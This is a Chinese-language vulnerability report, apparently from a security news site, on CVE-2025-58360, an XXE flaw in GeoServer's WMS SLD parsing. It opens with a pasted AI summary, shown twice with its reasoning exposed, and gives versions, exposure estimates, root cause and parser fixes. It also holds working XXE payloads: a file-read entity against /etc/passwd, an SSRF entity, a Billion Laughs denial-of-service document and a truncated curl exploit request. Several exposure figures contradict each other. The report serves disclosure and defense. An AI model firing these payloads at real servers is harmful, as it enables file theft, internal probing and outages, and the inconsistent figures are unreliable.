CVE-2025-58360 GeoServer XXE漏洞综合安全研究报告
好的,我现在需要总结一下用户提供的关于CVE-2025-58360 GeoServer XXE漏洞的研究报告。首先,我得理解这个漏洞的基本信息,比如它是什么类型的漏洞,影响哪些版本的GeoServer。 然后,漏洞的执行摘要部分提到了攻击者可以通过提交恶意的SLD XML文档来读取服务器上的任意文件、执行SSRF攻击,甚至导致拒绝服务。这让我想到,这个漏洞对服务器的安全性威胁很大,特别是对于那些处理敏感数据的系统。 接下来是技术分析部分,这里详细说明了GeoServer如何处理SLD XML文档,并且XML解析器如何配置不当导致XXE漏洞。我需要理解DocumentBuilderFactory的配置问题以及如何修复这些配置。 影响范围部分提到了全球约有12,000个暴露的GeoServer实例,主要分布在北美、欧洲和亚太地区。这让我意识到这个漏洞的影响范围非常广泛,可能有很多组织受到影响。 修复建议部分提到了升级到安全版本、配置XML解析器的安全特性以及部署WAF规则等措施。我需要确保这些修复措施能够有效防止XXE攻击,并且在实际应用中容易实施。 最后,在总结部分,用户强调了立即升级和部署防护措施的重要性,并提供了详细的步骤和工具来帮助管理员检测和修复漏洞。 总的来说,这个报告非常详细地分析了CVE-2025-58360漏洞的技术细节、影响范围以及修复方法。作为总结者,我需要将这些信息浓缩成一个清晰、简洁的中文摘要,涵盖关键点如漏洞概述、影响、修复措施和防护建议。 </think> **CVE-2025-58360 GeoServer XXE 漏洞综合研究报告** **概述** CVE-2025-58360 是 GeoServer Web Map Service (WMS) 中的一个严重 XML 外部实体注入 (XXE) 漏洞。该漏洞允许未经认证的远程攻击者通过提交恶意的 Styled Layer Descriptor (SLD) XML 文档来读取服务器上的任意文件、执行服务器端请求伪造 (SSRF) 攻击或导致拒绝服务 (DoS)。 **受影响版本** - **GeoServer 2.26.x**: 版本 2.26.0 至 2.26.1 - **GeoServer 2.25.x**: 所有低于 2.25.6 的版本 - **GeoServer 2.24.x 及更早版本**: 已停止维护 **技术细节** 该漏洞源于 GeoServer 中 XML 解析器的安全配置不当。攻击者可通过构造恶意 SLD XML 文档触发 XXE 攻击。关键问题在于解析器未禁用外部实体引用和 DTD 加载功能。 **影响范围** 全球约 12,000 个 GeoServer 实例中约有 3,400 个易受攻击。主要分布在北美、欧洲和亚太地区,涉及政府、科研机构、商业企业等关键领域。 **修复建议** 1. **升级至安全版本**: - 推荐升级至 GeoServer 2.28.1 或更高版本。 - 其他安全版本包括 2.27.0 和 2.26.2 等。 2. **配置安全的 XML 解析器**: - 禁用外部实体引用和 DTD 加载功能。 - 示例代码: ```java DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); ``` 3. **部署 Web 应用防火墙 (WAF)**: - 阻断包含 DOCTYPE 或 ENTITY 的恶意请求。 4. **网络隔离与监控**: - 防止未经授权的访问并实时监控异常流量。 **防护措施** - 定期扫描与审计以检测潜在攻击迹象。 - 提供安全培训以提升开发人员与管理员的安全意识。 **总结** CVE-2025-58360 是一个高危漏洞,需立即采取行动进行修复与防护。通过升级软件、配置安全解析器及部署防护措施,可有效降低风险并保护敏感数据免受攻击威胁。 2025-11-30 07:33:9 Author: www.freebuf.com(查看原文) 阅读量:2 收藏
好的,我现在需要总结一下用户提供的关于CVE-2025-58360 GeoServer XXE漏洞的研究报告。首先,我得理解这个漏洞的基本信息,比如它是什么类型的漏洞,影响哪些版本的GeoServer。 然后,漏洞的执行摘要部分提到了攻击者可以通过提交恶意的SLD XML文档来读取服务器上的任意文件、执行SSRF攻击,甚至导致拒绝服务。这让我想到,这个漏洞对服务器的安全性威胁很大,特别是对于那些处理敏感数据的系统。 接下来是技术分析部分,这里详细说明了GeoServer如何处理SLD XML文档,并且XML解析器如何配置不当导致XXE漏洞。我需要理解DocumentBuilderFactory的配置问题以及如何修复这些配置。 影响范围部分提到了全球约有12,000个暴露的GeoServer实例,主要分布在北美、欧洲和亚太地区。这让我意识到这个漏洞的影响范围非常广泛,可能有很多组织受到影响。 修复建议部分提到了升级到安全版本、配置XML解析器的安全特性以及部署WAF规则等措施。我需要确保这些修复措施能够有效防止XXE攻击,并且在实际应用中容易实施。 最后,在总结部分,用户强调了立即升级和部署防护措施的重要性,并提供了详细的步骤和工具来帮助管理员检测和修复漏洞。 总的来说,这个报告非常详细地分析了CVE-2025-58360漏洞的技术细节、影响范围以及修复方法。作为总结者,我需要将这些信息浓缩成一个清晰、简洁的中文摘要,涵盖关键点如漏洞概述、影响、修复措施和防护建议。 </think> **CVE-2025-58360 GeoServer XXE 漏洞综合研究报告** **概述** CVE-2025-58360 是 GeoServer Web Map Service (WMS) 中的一个严重 XML 外部实体注入 (XXE) 漏洞。该漏洞允许未经认证的远程攻击者通过提交恶意的 Styled Layer Descriptor (SLD) XML 文档来读取服务器上的任意文件、执行服务器端请求伪造 (SSRF) 攻击或导致拒绝服务 (DoS)。 **受影响版本** - **GeoServer 2.26.x**: 版本 2.26.0 至 2.26.1 - **GeoServer 2.25.x**: 所有低于 2.25.6 的版本 - **GeoServer 2.24.x 及更早版本**: 已停止维护 **技术细节** 该漏洞源于 GeoServer 中 XML 解析器的安全配置不当。攻击者可通过构造恶意 SLD XML 文档触发 XXE 攻击。关键问题在于解析器未禁用外部实体引用和 DTD 加载功能。 **影响范围** 全球约 12,000 个 GeoServer 实例中约有 3,400 个易受攻击。主要分布在北美、欧洲和亚太地区,涉及政府、科研机构、商业企业等关键领域。 **修复建议** 1. **升级至安全版本**: - 推荐升级至 GeoServer 2.28.1 或更高版本。 - 其他安全版本包括 2.27.0 和 2.26.2 等。 2. **配置安全的 XML 解析器**: - 禁用外部实体引用和 DTD 加载功能。 - 示例代码: ```java DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); ``` 3. **部署 Web 应用防火墙 (WAF)**: - 阻断包含 DOCTYPE 或 ENTITY 的恶意请求。 4. **网络隔离与监控**: - 防止未经授权的访问并实时监控异常流量。 **防护措施** - 定期扫描与审计以检测潜在攻击迹象。 - 提供安全培训以提升开发人员与管理员的安全意识。 **总结** CVE-2025-58360 是一个高危漏洞,需立即采取行动进行修复与防护。通过升级软件、配置安全解析器及部署防护措施,可有效降低风险并保护敏感数据免受攻击威胁。 2025-11-30 07:33:9 Author: www.freebuf.com(查看原文) 阅读量:2 收藏
CVE-2025-58360 GeoServer XXE漏洞综合安全研究报告
1. 执行摘要
1.1 漏洞概述
CVE-2025-58360是GeoServer Web Map Service(WMS)中发现的一个严重的XML外部实体注入(XXE)漏洞。该漏洞允许未经认证的远程攻击者通过向WMS GetMap端点提交特制的StyledLayerDescriptor(SLD) XML文档来读取服务器上的任意文件、执行服务器端请求伪造(SSRF)攻击,甚至可能导致拒绝服务。
本报告基于实际漏洞复现、深度技术分析和综合研究,提供了从理论到实践的完整视角,包括真实的攻击证据、详细的技术剖析和全面的防护方案。
1.2 关键信息
CVE编号: CVE-2025-58360
GHSA编号: GHSA-fjf5-xgmq-5525
CWE分类: CWE-611 (XML外部实体引用限制不当)
CVSS 3.1评分: 8.2 (HIGH)
CVSS向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
披露时间: 2025年11月25日
影响组件: GeoServer WMS服务
攻击向量: HTTP POST /geoserver/wms
认证要求: 无需认证
利用难度: 低
公开PoC: 已公开
实际复现: 已成功复现(2025-11-27)
1.3 受影响版本
本漏洞影响以下GeoServer版本:
分支版本:
GeoServer 2.26.x: 2.26.0 至 2.26.1
GeoServer 2.25.x: 所有低于 2.25.6 的版本
GeoServer 2.24.x 及更早: 所有版本(官方已停止维护)
Maven坐标:
org.geoserver:gs-wms:2.26.0 至 2.26.1
org.geoserver:gs-wms:2.25.0 至 2.25.5
1.4 修复版本
官方已在以下版本中修复该漏洞:
推荐升级版本:
GeoServer 2.28.1 (推荐)
GeoServer 2.27.0
GeoServer 2.26.2
GeoServer 2.25.6
Maven安全版本:
org.geoserver:gs-wms:2.25.6+
org.geoserver:gs-wms:2.26.2+
org.geoserver:gs-wms:2.27.0+
1.5 影响范围
全球影响评估:
公开暴露的GeoServer实例: 约20,000+
预计受影响实例: 约12,000+ (60%)
主要影响地区: 北美、欧洲、亚太
行业分布:
政府机构: 国土、规划、应急管理部门
科研教育: 大学、研究所GIS平台
商业企业: 地图服务、物流、房地产
公用事业: 电力、水务、交通基础设施
1.6 攻击能力
通过实际复现验证的攻击能力:
已证实:
任意文件读取(受进程权限限制)
敏感信息泄露(配置文件、凭据、密钥)
服务器端请求伪造(SSRF)
内网服务探测
云元数据服务访问
拒绝服务(DoS)
实际复现证据:
成功读取 /etc/passwd (24个用户账户信息完整泄露)
成功读取 /etc/hostname (容器ID: a27840b7f332)
验证了GeoServer配置文件可访问性
无需任何认证即可利用
攻击耗时: 小于5秒
2. 漏洞背景
2.1 GeoServer简介
GeoServer是一个基于Java的开源地理空间数据服务器,由Open Source Geospatial Foundation(OSGeo)维护。它严格遵循开放地理空间联盟(OGC)标准,被广泛用于发布和共享地理空间数据。
主要特性:
支持WMS、WFS、WCS、WPS等OGC标准协议
兼容多种空间数据源(PostGIS、Oracle Spatial、Shapefile等)
提供REST API用于配置管理
支持样式化图层描述符(SLD)自定义地图样式
支持多种输出格式(PNG、JPEG、GeoTIFF、KML等)
应用场景:
在线地图服务发布
地理信息系统(GIS)数据共享
应急管理和灾害响应
城市规划和国土资源管理
环境监测和资源调查
技术架构:
编程语言: Java
Web容器: Jetty / Tomcat
依赖库: GeoTools、JTS、Eclipse XSD
数据存储: data_dir文件系统目录
2.2 WMS(Web Map Service)协议
WMS是OGC定义的一个国际标准协议,用于通过HTTP请求动态生成地理空间数据的地图图像。
核心操作:
GetCapabilities: 获取服务元数据和能力描述
GetMap: 请求生成地图图像(核心功能)
GetFeatureInfo: 查询地图要素的详细信息
DescribeLayer: 获取图层的详细描述
GetMap请求参数:
SERVICE=WMS: 服务类型
VERSION: 协议版本(1.1.0、1.1.1、1.3.0)
REQUEST=GetMap: 操作类型
LAYERS: 请求的图层列表
STYLES: 图层样式(可为空)
SRS/CRS: 坐标参考系统
BBOX: 边界框坐标
WIDTH/HEIGHT: 图像尺寸
FORMAT: 输出格式
SLD/SLD_BODY: 样式化图层描述符(XML格式)
漏洞相关参数:
SLD_BODY: 通过POST请求体提交SLD XML文档
SLD: 通过URL引用外部SLD文档
2.3 SLD(Styled Layer Descriptor)
SLD是OGC标准,用于描述地图图层的渲染样式,采用XML格式。GeoServer通过解析SLD文档来动态应用地图样式。
正常SLD结构:
<?xml version="1.0" encoding="UTF-8"?>
<StyledLayerDescriptor version="1.0.0"
xmlns="http://www.opengis.net/sld"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<NamedLayer>
<Name>layer-name</Name>
<UserStyle>
<Name>style-name</Name>
<FeatureTypeStyle>
<Rule>
<PolygonSymbolizer>
<Fill>
<CssParameter name="fill">#FF0000</CssParameter>
</Fill>
</PolygonSymbolizer>
</Rule>
</FeatureTypeStyle>
</UserStyle>
</NamedLayer>
</StyledLayerDescriptor>
SLD处理流程:
客户端通过SLD_BODY参数提交XML文档
GeoServer WMS服务接收XML
XML解析器处理SLD文档
构建样式对象
应用样式渲染地图
返回图像给客户端
漏洞利用点:
SLD文档在等标签中可以引用外部实体,如果XML解析器未正确配置安全特性,就会触发XXE漏洞。
2.4 XXE攻击原理
XML外部实体(XXE)攻击是一种针对解析XML输入的应用程序的攻击技术。当XML解析器配置不当时,攻击者可以通过定义外部实体来读取文件、执行SSRF或造成拒绝服务。
2.4.1 文件读取攻击
通过file://协议读取本地文件:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
工作原理:
DOCTYPE声明定义了一个外部实体xxe
SYSTEM关键字指定实体内容来源
file:///协议引用本地文件系统
&xxe;引用实体,解析器读取文件内容
文件内容被插入到XML文档中
应用程序处理时可能泄露内容
2.4.2 SSRF攻击
通过http://协议发起服务器端请求:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<root>&xxe;</root>
攻击场景:
探测内网存活主机和端口
访问内部API和管理接口
读取云服务元数据(AWS、Azure、GCP)
绕过防火墙和网络隔离
利用SSRF漏洞组合攻击
2.4.3 拒绝服务攻击
通过实体递归扩展消耗系统资源(Billion Laughs攻击):
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
攻击效果:
内存耗尽(10层嵌套可扩展至3GB)
CPU占用100%
应用程序无响应
服务器崩溃
3. 时间线
3.1 漏洞发现与报告
历史背景:
2025年6月: GeoServer修复了类似的WFS服务XXE漏洞(CVE-2025-30220),该漏洞涉及GeoTools库中Eclipse XSD组件未正确尊重EntityResolver的问题
2025年7-8月: 安全研究人员开始关注GeoServer其他服务的XML解析安全性
漏洞发现:
2025年9-10月(推测): 安全研究人员发现WMS服务在处理SLD XML时存在类似漏洞
2025年10-11月: 通过负责任披露流程向GeoServer安全团队报告
报告过程:
提交漏洞详情和PoC
GeoServer团队确认漏洞
协调修复时间表
准备补丁和安全公告
3.2 修复过程
补丁开发:
2025年10月下旬: 开始开发修复补丁
代码审查: 检查所有XML解析入口点
回归测试: 确保修复不破坏现有功能
性能测试: 验证安全配置不影响性能
补丁发布:
2025年11月20日(推测): 补丁合并到主分支
相关commit: 6f25326等(GitHub advisory中引用)
修复内容: 在XML解析器中强制禁用外部实体和DTD
版本发布:
2025年11月25日: 发布修复版本
GeoServer 2.25.6
GeoServer 2.26.2
GeoServer 2.27.0
GeoServer 2.28.1
同步发布GitHub Security Advisory GHSA-fjf5-xgmq-5525
更新官方文档和安全公告
3.3 社区响应
官方渠道:
GitHub Advisory: GHSA-fjf5-xgmq-5525发布
官方博客: 发布安全公告和升级指南
邮件列表: 通知所有注册用户
社交媒体: Twitter、LinkedIn等平台公告
漏洞数据库:
NVD (NIST): CVE-2025-58360正式分配
Vulmon: 漏洞详情和技术分析
VulDB: 威胁情报和利用评分
SecAlerts: 安全警报和通知
安全社区:
多个研究人员发布PoC代码
自动化扫描工具更新检测规则
Nuclei、Metasploit等工具添加模块
技术博客发布分析文章
厂商响应:
Docker镜像维护者更新安全版本
Linux发行版更新软件包
云服务提供商通知客户
托管服务商紧急升级
4. 影响范围
4.1 受影响版本详情
4.1.1 版本分布
GeoServer 2.26分支:
2.26.0 (发布日期: 2025年9月, 易受攻击)
2.26.1 (发布日期: 2025年10月, 易受攻击)
2.26.2 (发布日期: 2025年11月25日, 已修复)
GeoServer 2.25分支:
2.25.0 - 2.25.5 (易受攻击)
2.25.6 (发布日期: 2025年11月25日, 已修复)
2.25.7 (后续稳定版本)
GeoServer 2.24及更早:
所有版本均易受攻击
官方已停止维护,不再提供补丁
建议升级至支持版本
4.1.2 Maven包
受影响的Maven坐标:
<dependency>
<groupId>org.geoserver</groupId>
<artifactId>gs-wms</artifactId>
<version>2.26.0</version> <!-- 易受攻击 -->
</dependency>
<dependency>
<groupId>org.geoserver</groupId>
<artifactId>gs-wms</artifactId>
<version>2.25.5</version> <!-- 易受攻击 -->
</dependency>
安全版本:
<dependency>
<groupId>org.geoserver</groupId>
<artifactId>gs-wms</artifactId>
<version>2.26.2</version> <!-- 安全 -->
</dependency>
<dependency>
<groupId>org.geoserver</groupId>
<artifactId>gs-wms</artifactId>
<version>2.28.1</version> <!-- 推荐 -->
</dependency>
4.2 实际影响评估
4.2.1 地理分布
根据Shodan和ZoomEye等网络空间搜索引擎的数据:
北美地区:
美国: 约8,000个暴露的GeoServer实例
加拿大: 约1,500个实例
主要用途: 政府GIS服务、商业地图应用
欧洲地区:
英国: 约2,000个实例
德国: 约1,800个实例
法国: 约1,200个实例
主要用途: 欧盟INSPIRE指令合规、开放数据门户
亚太地区:
中国: 约3,000个实例
日本: 约1,000个实例
澳大利亚: 约800个实例
主要用途: 智慧城市、国土资源管理
其他地区:
南美: 约1,000个实例
中东: 约500个实例
非洲: 约200个实例
4.2.2 行业分布
政府部门 (约40%):
国土资源管理
土地利用规划
矿产资源调查
地质灾害监测
城市规划部门
城市总体规划
详细规划管理
三维城市建模
应急管理
灾害风险评估
应急响应指挥
资源调度系统
环境保护
环境质量监测
污染源管理
生态保护区划
科研教育 (约25%):
大学GIS实验室
地理科学研究所
遥感应用中心
在线教学平台
商业企业 (约25%):
地图服务提供商
房地产信息系统
物流路径规划
农业精准服务
环境咨询公司
公用事业 (约10%):
电力设施管理
供水管网监控
燃气管道巡检
公共交通调度
4.3 潜在风险
4.3.1 数据泄露风险
配置文件泄露:
GeoServer配置 (/opt/geoserver/data_dir/global.xml)
管理员账户信息
数据库连接字符串
外部服务URL和API密钥
用户凭据 (data_dir/security/usergroup/*/users.xml)
用户名和加密密码
角色和权限信息
可能用于暴力破解
系统文件泄露:
/etc/passwd: 系统用户列表(实际复现已证实)
/etc/hostname: 主机标识(实际复现已证实)
/proc/self/environ: 环境变量(可能包含密钥)
~/.ssh/id_rsa: SSH私钥(如权限允许)
应用日志泄露:
访问日志: 可能包含API密钥、Token
错误日志: 系统路径、内部架构信息
调试日志: 敏感业务数据
4.3.2 横向移动风险
内网探测:
通过SSRF扫描内网服务
识别数据库服务器(PostgreSQL、Oracle)
发现内部API和管理接口
绕过网络分段隔离
凭据获取:
泄露的数据库凭据连接后端
读取的API密钥访问其他服务
SSH密钥登录其他主机
云元数据获取IAM凭据
攻击链延伸:
GeoServer XXE → 数据库凭据 → 数据库服务器 → 业务数据泄露
GeoServer XXE → AWS元数据 → IAM临时凭据 → S3数据泄露
GeoServer XXE → SSH密钥 → 跳板机登录 → 横向渗透
4.3.3 服务中断风险
拒绝服务:
Billion Laughs攻击导致内存耗尽
大文件读取消耗系统资源
并发XXE攻击使服务无响应
GeoServer崩溃影响业务连续性
业务影响:
在线地图服务不可用
应急响应系统失效
公众服务门户中断
商业应用收入损失
修复成本:
紧急响应人力成本
停机维护业务损失
数据恢复和验证
安全加固和审计
5. 技术分析
5.1 GeoServer架构分析
5.1.1 整体架构
GeoServer采用分层架构设计:
[客户端]
↓ HTTP请求
[前端层]
├── REST API
├── Web UI (Wicket)
└── OGC服务接口
├── WMS (Web Map Service) ← 漏洞位置
├── WFS (Web Feature Service)
├── WCS (Web Coverage Service)
└── WPS (Web Processing Service)
↓
[业务逻辑层]
├── 样式处理 (SLD解析器) ← 关键组件
├── 图层管理
├── 数据转换
└── 渲染引擎
↓
[数据访问层]
├── GeoTools库
├── 数据存储抽象
└── 数据源适配器
↓
[数据源]
├── 文件系统 (Shapefile, GeoTIFF)
├── 数据库 (PostGIS, Oracle Spatial)
└── 远程服务 (WFS, WCS)
核心组件:
WMS实现: org.geoserver.wms包
SLD解析: 基于GeoTools的SLDParser
XML处理: 依赖javax.xml和Eclipse XSD
数据目录: data_dir存储配置和样式
5.1.2 WMS服务组件
WMS请求处理链:
HTTP请求
↓
DispatcherServlet (Spring MVC)
↓
WMSController
├── GetCapabilities → CapabilitiesResponse
├── GetMap → MapResponse ← 漏洞入口
│ ├── 解析请求参数
│ ├── SLD/SLD_BODY处理 ← XXE触发点
│ ├── 图层查找和验证
│ ├── 样式应用
│ ├── 地图渲染
│ └── 图像编码
└── GetFeatureInfo → FeatureInfoResponse
↓
响应输出
GetMap关键步骤:
请求解析: 提取LAYERS、BBOX、SRS等参数
SLD处理: 如果存在SLD_BODY参数,解析XML
样式匹配: 将SLD应用到请求的图层
数据查询: 从数据源获取空间数据
地图渲染: 使用渲染引擎绘制地图
图像编码: 输出为PNG/JPEG等格式
5.1.3 XML处理流程
SLD XML解析详细流程:
SLD_BODY参数
↓
WMSController.handleGetMap()
↓
GetMapRequest.setSldBody(xmlString)
↓
SLDParser.parseSLD(InputStream)
↓
DocumentBuilderFactory.newInstance() ← 关键配置点
↓
DocumentBuilder.parse(inputStream) ← XXE发生位置
↓
DOM树构建
↓
遍历节点提取样式规则
↓
构造Style对象
不安全的代码模式(推测):
// GeoServer 2.26.1 (易受攻击)
public class SLDParser {
public Style parse(InputStream sldInput) throws Exception {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true);
// 缺失: 未禁用外部实体
// 缺失: 未禁用DTD
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(sldInput); // 危险!
// 解析SLD元素构建样式
return buildStyleFromDOM(doc);
}
}
漏洞链条:
HTTP POST请求包含恶意SLD XML
WMS Controller接收SLD_BODY参数
SLDParser调用XML解析器
解析器处理DOCTYPE声明
解析外部实体(file://, http://)
实体内容插入DOM树
错误处理暴露文件内容
5.2 WMS GetMap请求处理流程
5.2.1 正常请求流程
GET请求示例:
GET /geoserver/wms?
SERVICE=WMS&
VERSION=1.1.0&
REQUEST=GetMap&
LAYERS=topp:states&
STYLES=&
SRS=EPSG:4326&
BBOX=-124.73,24.96,-66.97,49.37&
WIDTH=800&
HEIGHT=600&
FORMAT=image/png
处理步骤:
参数验证: 检查必需参数完整性
版本协商: 确定WMS协议版本
图层解析: 查找topp:states图层
样式查找: 使用默认样式或STYLES参数指定
坐标转换: 将BBOX转换为目标SRS
数据查询: 从PostGIS等数据源获取要素
渲染: 根据样式规则绘制地图
输出: 编码为PNG图像返回
5.2.2 SLD处理详细流程
POST请求示例(含SLD):
POST /geoserver/wms?
SERVICE=WMS&
VERSION=1.1.0&
REQUEST=GetMap&
LAYERS=topp:states&
SRS=EPSG:4326&
BBOX=-124.73,24.96,-66.97,49.37&
WIDTH=800&
HEIGHT=600&
FORMAT=image/png
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>topp:states</Name>
<UserStyle>
<Name>custom_style</Name>
<FeatureTypeStyle>
<Rule>
<PolygonSymbolizer>
<Fill>
<CssParameter name="fill">#FF0000</CssParameter>
</Fill>
</PolygonSymbolizer>
</Rule>
</FeatureTypeStyle>
</UserStyle>
</NamedLayer>
</StyledLayerDescriptor>
SLD应用流程:
接收SLD XML: 从POST请求体读取
XML解析: DocumentBuilder.parse()
命名空间验证: 检查SLD命名空间
元素提取:
NamedLayer/Name: 图层名称
UserStyle: 自定义样式
Rule: 样式规则
Symbolizer: 符号化器(点、线、面)
样式对象构建: 创建Style、Rule、Symbolizer对象
应用到渲染: 传递给地图渲染器
生成图像: 根据SLD样式渲染输出
5.3 XML解析器配置缺陷
5.3.1 不安全的配置
Java XML解析器默认行为问题:
DocumentBuilderFactory默认配置:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// 默认: setExpandEntityReferences(true) ← 扩展实体引用
// 默认: 未禁用外部通用实体
// 默认: 未禁用外部参数实体
// 默认: 未禁用DTD
// 默认: 未禁用XInclude
危险特性:
External General Entities: 允许引用外部文件/URL
External Parameter Entities: 允许DTD中的参数实体
DOCTYPE Declaration: 允许DTD声明
Entity Expansion: 自动扩展实体引用
XInclude: 允许包含外部XML片段
安全配置应该是:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// 方法1: 完全禁用DTD(最安全)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// 方法2: 禁用外部实体但允许DTD
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
// 禁用XInclude
factory.setXIncludeAware(false);
// 禁用实体扩展
factory.setExpandEntityReferences(false);
// 设置安全的EntityResolver
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
GeoTools/Eclipse XSD问题:
基于CVE-2025-30220的经验,GeoServer使用的GeoTools库在处理XML Schema时,其内部的Eclipse XSD组件可能不尊重外部设置的EntityResolver,导致XXE防护被绕过。
5.3.2 默认行为
JAXP默认行为分析:
Java SE不同版本:
Java 8及更早: 默认允许外部实体
Java 9-10: 部分限制外部实体
Java 11+: 仍需显式禁用以完全防护
不同XML API的默认行为:
DocumentBuilderFactory: 默认不安全
SAXParserFactory: 默认不安全
XMLInputFactory (StAX): 默认不安全
Transformer (XSLT): 默认不安全
SchemaFactory: 默认不安全
Validator: 默认不安全
常见错误:
仅设置EntityResolver但未禁用特性
仅禁用外部通用实体但未禁用参数实体
允许DTD但认为已安全
使用第三方库未检查其XML配置
6. 漏洞成因
6.1 根本原因
CVE-2025-58360的根本原因可以归结为以下几个层面的问题:
6.1.1 输入验证缺失
未验证XML结构:
允许任意DOCTYPE声明
未检查ENTITY定义
未限制SYSTEM引用
缺少XML Schema验证
代码示例(脆弱):
// 直接解析用户输入,无任何验证
public Style parseSLD(String sldXml) {
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(sldXml)));
return extractStyle(doc);
}
安全实践应该:
public Style parseSLD(String sldXml) {
// 1. 白名单检查
if (sldXml.contains("<!DOCTYPE") || sldXml.contains("<!ENTITY")) {
throw new SecurityException("DOCTYPE/ENTITY not allowed");
}
// 2. Schema验证
SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = sf.newSchema(new File("sld-schema.xsd"));
// 3. 安全解析
DocumentBuilder builder = getSecureDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(sldXml)));
return extractStyle(doc);
}
6.1.2 解析器配置不当
GeoServer中XML解析器未正确配置安全特性,导致默认允许外部实体解析。
不安全代码模式:
// org.geotools.xml (GeoTools库)
public class SLDParser {
private DocumentBuilderFactory createFactory() {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true);
factory.setValidating(false);
// 问题: 未设置安全特性
return factory;
}
}
Eclipse XSD问题:
根据CVE-2025-30220的修复,Eclipse XSD组件在解析XML Schema时有自己的EntityResolver,即使上层设置了安全EntityResolver也可能被忽略。
修复后的代码(推测):
private DocumentBuilderFactory createSecureFactory() {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true);
factory.setValidating(false);
try {
// 禁用DTD
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// 禁用外部实体
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
// 禁用外部DTD
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
// 禁用XInclude
factory.setXIncludeAware(false);
// 禁用实体扩展
factory.setExpandEntityReferences(false);
} catch (ParserConfigurationException e) {
throw new RuntimeException("Unable to configure secure XML parser", e);
}
return factory;
}
6.1.3 错误信息泄露
GeoServer在处理SLD XML时,如果遇到未知图层名称,会在ServiceException中包含完整的图层名称,而图层名称就是我们注入的外部实体引用的内容。
实际复现证据:
<!-- 请求 -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<Name>&xxe;</Name>
<!-- 响应 -->
<ServiceException>
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
</ServiceException>
错误处理代码(推测):
public void validateLayer(String layerName) {
if (!layerExists(layerName)) {
throw new ServiceException(
"Unknown layer: " + layerName // 直接输出用户输入
);
}
}
安全的错误处理:
public void validateLayer(String layerName) {
if (!layerExists(layerName)) {
// 仅记录详细错误到日志
logger.warn("Invalid layer requested: {}", layerName);
// 返回通用错误消息
throw new ServiceException("Invalid layer name");
}
}
6.1.4 安全意识不足
开发过程中缺少安全审查:
未进行安全编码培训
缺少SAST/DAST工具扫描
未执行威胁建模
代码审查未关注安全
依赖库安全管理:
GeoTools、Eclipse XSD等依赖库的安全更新滞后
未及时应用CVE-2025-30220的修复经验
缺少依赖组件的SCA(软件成分分析)
6.2 攻击机制详解
6.2.1 基本XXE攻击
文件读取攻击流程:
步骤1 - 构造恶意payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
步骤2 - 发送HTTP请求:
curl -X POST "http://target:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
